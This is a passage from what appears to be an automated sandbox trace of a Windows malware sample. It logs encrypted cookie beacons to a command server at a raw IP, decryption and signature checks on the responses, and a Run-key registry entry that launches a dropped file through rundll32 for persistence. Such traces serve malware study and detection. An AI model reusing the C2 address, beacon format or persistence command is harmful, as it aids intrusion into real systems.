zy=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThE4cM0r2lIA92m+3aRIZIZ3c9j2ipvay+tr+jSwlf14mgn/GOze6Nt6eOqhtVwTJNGQxWFUex5l57ixB8DkH3oFQcRQTVw+bZhF9Rr4lIKlWkC4RnBeTOt9gRwhcz/9PgLkb/UD\r\n") returned 361 [0554.571] GetProcessHeap () returned 0x530000 [0554.572] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0554.572] GetProcessHeap () returned 0x530000 [0554.573] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0554.573] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0554.578] GetProcessHeap () returned 0x530000 [0554.578] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0554.578] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0554.583] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="kIYPnZCNPtrLUyNKeydGtHtlcmHBBTEEfGqcmEIywqcBshQXLJTYLMwsdqzWYx", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0554.584] GetProcessHeap () returned 0x530000 [0554.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0554.584] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0554.585] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0554.585] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0554.585] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: zy=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePThE4cM0r2lIA92m+3aRIZIZ3c9j2ipvay+tr+jSwlf14mgn/GOze6Nt6eOqhtVwTJNGQxWFUex5l57ixB8DkH3oFQcRQTVw+bZhF9Rr4lIKlWkC4RnBeTOt9gRwhcz/9PgLkb/UD\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0555.786] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0555.786] GetProcessHeap () returned 0x530000 [0555.786] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0555.786] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x31c) returned 1 [0555.786] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4811c, dwNumberOfBytesToRead=0xfce4, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4811c*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0555.786] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0555.786] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0555.786] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0555.787] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0555.787] GetProcessHeap () returned 0x530000 [0555.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0555.787] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0555.787] GetProcessHeap () returned 0x530000 [0555.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0555.787] GetProcessHeap () returned 0x530000 [0555.787] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0555.787] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0555.787] GetProcessHeap () returned 0x530000 [0555.787] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0555.787] GetProcessHeap () returned 0x530000 [0555.788] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0555.788] GetProcessHeap () returned 0x530000 [0555.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0555.788] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0555.788] GetProcessHeap () returned 0x530000 [0555.788] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0555.788] GetProcessHeap () returned 0x530000 [0555.788] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0555.788] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0555.788] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0555.789] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0555.789] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0555.789] GetProcessHeap () returned 0x530000 [0555.789] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0555.789] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0555.789] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0555.791] GetProcessHeap () returned 0x530000 [0555.791] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0555.791] GetProcessHeap () returned 0x530000 [0555.792] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0555.792] GetProcessHeap () returned 0x530000 [0555.792] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0555.792] GetProcessHeap () returned 0x530000 [0555.792] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a5b260 | out: hHeap=0x530000) returned 1 [0555.792] GetProcessHeap () returned 0x530000 [0555.793] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0555.793] GetProcessHeap () returned 0x530000 [0555.793] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0555.793] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0555.793] GetProcessHeap () returned 0x530000 [0555.793] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0555.793] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qCnOhZL") returned 97 [0555.793] GetProcessHeap () returned 0x530000 [0555.794] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0555.794] GetProcessHeap () returned 0x530000 [0555.794] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0555.794] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0555.794] GetProcessHeap () returned 0x530000 [0555.795] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0555.795] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qCnOhZL") returned 97 [0555.795] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qCnOhZL", cbData=0xc4 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",qCnOhZL") returned 0x0 [0555.796] RegCloseKey (hKey=0x648) returned 0x0 [0555.796] GetProcessHeap () returned 0x530000 [0555.796] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0555.796] GetProcessHeap () returned 0x530000 [0555.796] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0555.796] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xea278) returned 0x102 [0565.800] GetProcessHeap () returned 0x530000 [0565.800] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0565.800] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0565.800] GetProcessHeap () returned 0x530000 [0565.800] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0565.800] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0565.801] GetProcessHeap () returned 0x530000 [0565.801] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0565.801] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0565.801] GetProcessHeap () returned 0x530000 [0565.801] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0565.801] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0565.804] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0565.804] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0565.804] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0565.804] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0565.804] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0565.804] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0565.805] GetProcessHeap () returned 0x530000 [0565.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0565.805] GetProcessHeap () returned 0x530000 [0565.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0565.805] GetProcessHeap () returned 0x530000 [0565.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0565.805] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0565.807] GetProcessHeap () returned 0x530000 [0565.807] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0565.807] GetProcessHeap () returned 0x530000 [0565.808] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0565.808] GetProcessHeap () returned 0x530000 [0565.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0565.808] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0565.808] GetProcessHeap () returned 0x530000 [0565.808] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0565.808] GetProcessHeap () returned 0x530000 [0565.808] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0565.808] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0565.808] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0565.808] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0565.808] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0565.808] GetProcessHeap () returned 0x530000 [0565.809] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0565.809] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0565.809] GetProcessHeap () returned 0x530000 [0565.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0565.809] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0565.809] GetProcessHeap () returned 0x530000 [0565.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a763b8 [0565.809] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a763b8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a763b8, pcbResult=0x2cf4b4) returned 0x0 [0565.809] GetProcessHeap () returned 0x530000 [0565.809] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd6) returned 0x2996d60 [0565.809] GetProcessHeap () returned 0x530000 [0565.810] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a763b8 | out: hHeap=0x530000) returned 1 [0565.810] GetProcessHeap () returned 0x530000 [0565.810] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0565.810] CryptBinaryToStringW (in: pbBinary=0x2996d60, cbBinary=0xd6, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0565.810] GetProcessHeap () returned 0x530000 [0565.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x242) returned 0x5edef0 [0565.810] CryptBinaryToStringW (in: pbBinary=0x2996d60, cbBinary=0xd6, dwFlags=0x40000001, pszString=0x5edef0, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTksyaABC29FBK1+eD0ZhvKIYCtZ+UDbTsAHrfcZjXUwTdYXhnf+EGkQugbmtAcDt/z1iq24gEQ==", pcchString=0x2cf504) returned 1 [0565.810] GetProcessHeap () returned 0x530000 [0565.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0565.810] GetProcessHeap () returned 0x530000 [0565.810] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630f8 [0565.810] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: iCuFSHdjjINy=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTksyaABC29FBK1+eD0ZhvKIYCtZ+UDbTsAHrfcZjXUwTdYXhnf+EGkQugbmtAcDt/z1iq24gEQ==\r\n") returned 311 [0565.810] GetProcessHeap () returned 0x530000 [0565.811] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630f8 | out: hHeap=0x530000) returned 1 [0565.811] GetProcessHeap () returned 0x530000 [0565.811] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5edef0 | out: hHeap=0x530000) returned 1 [0565.811] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0565.812] GetProcessHeap () returned 0x530000 [0565.812] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0565.812] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0565.813] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="SaByipWEoOu", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0565.813] GetProcessHeap () returned 0x530000 [0565.813] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0565.813] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0565.813] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0565.813] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0565.813] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: iCuFSHdjjINy=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTksyaABC29FBK1+eD0ZhvKIYCtZ+UDbTsAHrfcZjXUwTdYXhnf+EGkQugbmtAcDt/z1iq24gEQ==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0566.957] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0566.957] GetProcessHeap () returned 0x530000 [0566.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0566.957] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x119) returned 1 [0566.957] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f19, dwNumberOfBytesToRead=0xfee7, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f19*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0566.957] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0566.957] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0566.957] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0566.957] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0566.957] GetProcessHeap () returned 0x530000 [0566.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0566.957] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0566.957] GetProcessHeap () returned 0x530000 [0566.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72a8 [0566.957] GetProcessHeap () returned 0x530000 [0566.958] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0566.958] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0566.958] GetProcessHeap () returned 0x530000 [0566.958] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72a8 | out: hHeap=0x530000) returned 1 [0566.958] GetProcessHeap () returned 0x530000 [0566.959] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0566.959] GetProcessHeap () returned 0x530000 [0566.959] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63120 [0566.959] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0566.959] GetProcessHeap () returned 0x530000 [0566.959] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63120 | out: hHeap=0x530000) returned 1 [0566.959] GetProcessHeap () returned 0x530000 [0566.959] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0566.959] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0566.959] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0566.959] BCryptFinishHash (in: 